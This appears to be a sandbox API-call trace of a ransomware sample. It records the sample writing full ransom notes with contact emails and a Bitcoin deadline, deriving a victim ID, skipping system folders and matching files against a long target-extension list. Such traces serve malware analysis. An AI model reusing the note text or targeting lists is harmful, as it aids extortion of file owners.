	[0180.383] lstrcatW (in: lpString1="C:\\Users\\Default User\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default User\\*.*") returned="C:\\Users\\Default User\\*.*"
	[0180.383] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\*.*" (normalized: "c:\\users\\default user\\*.*"), lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0xffffffff
	[0180.384] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.384] lstrcpyW (in: lpString1=0x18d1b4, lpString2="C:\\Users\\Default User" | out: lpString1="C:\\Users\\Default User") returned="C:\\Users\\Default User"
	[0180.384] lstrcatW (in: lpString1="C:\\Users\\Default User", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default User\\*.*") returned="C:\\Users\\Default User\\*.*"
	[0180.384] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.384] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.384] wsprintfW (in: param_1=0x18caa0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Default User\\HELP_DECRYPT_YOUR_FILES.TXT") returned 49
	[0180.384] CreateFileW (lpFileName="C:\\Users\\Default User\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default user\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0180.387] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.387] WriteFile (in: hFile=0x37c, lpBuffer=0x18be58*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18cd7c, lpOverlapped=0x0 | out: lpBuffer=0x18be58*, lpNumberOfBytesWritten=0x18cd7c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.390] CloseHandle (hObject=0x37c) returned 1
	[0180.390] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18be28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18be28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.390] GetUserNameA (in: lpBuffer=0x18bd0c, pcbBuffer=0x18be24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18be24) returned 1
	[0180.392] wsprintfW (in: param_1=0x18cca8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.392] CreateFileW (lpFileName="C:\\Users\\Default User\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\default user\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0180.392] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.393] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.393] WriteFile (in: hFile=0x37c, lpBuffer=0x18cca8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18cd84, lpOverlapped=0x0 | out: lpBuffer=0x18cca8*, lpNumberOfBytesWritten=0x18cd84*=0x30, lpOverlapped=0x0) returned 1
	[0180.393] CloseHandle (hObject=0x37c) returned 1
	[0180.393] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.393] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.393] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.394] wsprintfW (in: param_1=0x18ca60, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Default User\\HELP_DECRYPT_YOUR_FILES.HTML") returned 50
	[0180.394] CreateFileW (lpFileName="C:\\Users\\Default User\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default user\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0180.396] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.396] WriteFile (in: hFile=0x37c, lpBuffer=0x18c254*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18cd78, lpOverlapped=0x0 | out: lpBuffer=0x18c254*, lpNumberOfBytesWritten=0x18cd78*=0x808, lpOverlapped=0x0) returned 1
	[0180.398] CloseHandle (hObject=0x37c) returned 1
	[0180.399] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.399] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18c23c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18c23c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.399] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.400] GetUserNameA (in: lpBuffer=0x18c120, pcbBuffer=0x18c238 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18c238) returned 1
	[0180.400] wsprintfA (in: param_1=0x18cc68, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.400] CreateFileW (lpFileName="C:\\Users\\Default User\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\default user\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0180.401] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.401] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.401] WriteFile (in: hFile=0x37c, lpBuffer=0x18cc68*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18cd80, lpOverlapped=0x0 | out: lpBuffer=0x18cc68*, lpNumberOfBytesWritten=0x18cd80*=0x43, lpOverlapped=0x0) returned 1
	[0180.401] CloseHandle (hObject=0x37c) returned 1
	[0180.401] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\*.*" (normalized: "c:\\users\\default user\\*.*"), lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0xffffffff
	[0180.402] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.402] FindNextFileW (in: hFindFile=0xfb9930, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3757c8c, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x973af366, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x973af366, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.402] FindNextFileW (in: hFindFile=0xfb9930, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x777cb379, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x777cb379, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x77f04e57, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0180.402] FindNextFileW (in: hFindFile=0xfb9930, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x777a50ef, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x777a50ef, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x77edf23a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0180.402] FindNextFileW (in: hFindFile=0xfb9930, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1
	[0180.402] lstrcmpW (lpString1="Public", lpString2="..") returned 1
	[0180.402] lstrcmpW (lpString1="Public", lpString2=".") returned 1
	[0180.402] lstrcpyW (in: lpString1=0x18dcbc, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users"
	[0180.402] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\"
	[0180.402] lstrcatW (in: lpString1="C:\\Users\\", lpString2="Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public"
	[0180.403] lstrcpyW (in: lpString1=0x18d1b4, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public"
	[0180.403] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\"
	[0180.403] lstrcpyW (in: lpString1=0x18cda4, lpString2="C:\\Users\\Public\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\"
	[0180.403] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\*.*") returned="C:\\Users\\Public\\*.*"
	[0180.403] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\*.*" (normalized: "c:\\users\\public\\*.*"), lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0180.403] lstrlenW (lpString="C:\\Users\\Public\\*.*") returned 19
	[0180.403] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.403] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\*.*", cchLength=0x13 | out: lpsz="c:\\users\\public\\*.*") returned 0x13
	[0180.403] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.404] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="windows") returned 0x0
	[0180.404] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.404] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="boot") returned 0x0
	[0180.404] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.404] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="system volume information") returned 0x0
	[0180.404] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.404] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0180.404] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.405] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="temp") returned 0x0
	[0180.405] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.405] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="program files") returned 0x0
	[0180.405] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.405] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="program files (x86)") returned 0x0
	[0180.405] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.405] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="appdata") returned 0x0
	[0180.405] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.406] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="application data") returned 0x0
	[0180.406] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.406] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="winnt") returned 0x0
	[0180.406] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.406] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="tmp") returned 0x0
	[0180.406] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.406] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="cache") returned 0x0
	[0180.406] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.419] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="temporary internet files") returned 0x0
	[0180.419] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.419] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="webcache") returned 0x0
	[0180.419] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.420] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="inetcache") returned 0x0
	[0180.420] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.420] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="nvidia") returned 0x0
	[0180.420] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.420] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="packages") returned 0x0
	[0180.420] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.420] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="cookies") returned 0x0
	[0180.421] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.421] StrStrW (lpFirst="c:\\users\\public\\*.*", lpSrch="programdata") returned 0x0
	[0180.421] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0180.421] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AccountPictures", cAlternateFileName="ACCOUN~1")) returned 1
	[0180.421] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x780f4db2, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x780f4db2, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1
	[0180.421] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0180.421] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0180.421] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0180.421] lstrcpyW (in: lpString1=0x18d814, lpString2="C:\\Users\\Public\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\"
	[0180.422] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\Public\\desktop.ini") returned="C:\\Users\\Public\\desktop.ini"
	[0180.422] lstrlenW (lpString="C:\\Users\\Public\\desktop.ini") returned 27
	[0180.422] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0180.422] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\desktop.ini", cchLength=0x1b | out: lpsz="c:\\users\\public\\desktop.ini") returned 0x1b
	[0180.422] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.423] StrStrW (lpFirst="c:\\users\\public\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0180.423] lstrcpyW (in: lpString1=0x18d3bc, lpString2="c:\\users\\public\\desktop.ini" | out: lpString1="c:\\users\\public\\desktop.ini") returned="c:\\users\\public\\desktop.ini"
	[0180.423] lstrlenW (lpString="c:\\users\\public\\desktop.ini") returned 27
	[0180.423] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.423] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.424] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0180.424] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0180.424] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.